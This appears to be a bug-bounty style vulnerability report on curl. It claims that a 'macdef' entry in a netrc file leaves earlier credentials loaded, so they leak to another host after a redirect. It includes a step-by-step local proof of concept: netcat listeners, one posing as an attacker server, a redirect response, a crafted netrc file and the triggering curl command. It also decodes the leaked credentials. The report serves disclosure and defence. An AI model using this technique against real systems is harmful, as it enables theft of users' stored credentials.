Credential leak on redirect due to improper state clearing when parsing macdef in netrc.c

## Summary : -When parsing a netrc. file, the macdef keyword fails to clear previously loaded credentials. If a redirect follows, these credentials are leaked to the new host. This is a new variant of CVE-2024-11053, triggered by a different code path ('macdef' instead of 'default'). ##No, this vulnerability was discovered through manual code analysis and testing ## Affected version : curl 8.15.0-DEV (x86_64-pc-linux-gnu) libcurl/8.15.0-DEV OpenSSL/3.5.0 zlib/1.3.1 libpsl/0.21.2 Release-Date: [unreleased] Protocols: dict file ftp ftps gopher gophers http https imap imaps ipfs ipns mqtt pop3 pop3s rtsp smb smbs smtp smtps telnet tftp ws wss Features: alt-svc AsynchDNS Debug HSTS HTTPS-proxy IPv6 Largefile libz NTLM PSL SSL threadsafe TLS-SRP TrackMemory UnixSockets ## Steps To Reproduce : Setup two listeners: 1- nc -l -p 9000 2-echo -e "HTTP/1.1 301 Moved Permanently\nLocation: http://localhost:9000" | nc -l -p 8000 -q 1 3-Create (poc_netrc.txt) file with the following content : ----------------------------------------------------- machine localhost login admin password SuperSecretPassword123 macdef foobar echo "malicious macro" default login not_admin ------------------------------------------------------ 4-Execute curl to trigger the leak: ./src/curl -L --netrc-file poc_netrc.txt http://localhost:8000 5-echo YWRtaW46U3VwZXJTZWNyZXRQYXNzd29yZDEyMw== > temp_output.txt 6-base64 -d < temp_output.txt -result : admin:SuperSecretPassword123 ## Supporting Material/References The output on the (Attacker Server) terminal (the one listening on port 9000) will show the leaked `Authorization` header containing the credentials for `localhost`. This proves that the credentials persisted across the redirect. ## Impact ##Impact: If an attacker controls the redirect, they can trick curl into sending the victim’s .netrc username and password to the wrong server. This can happen without the user noticing, especially in scripts or CI pipelines where curl runs automatically using .netrc for login.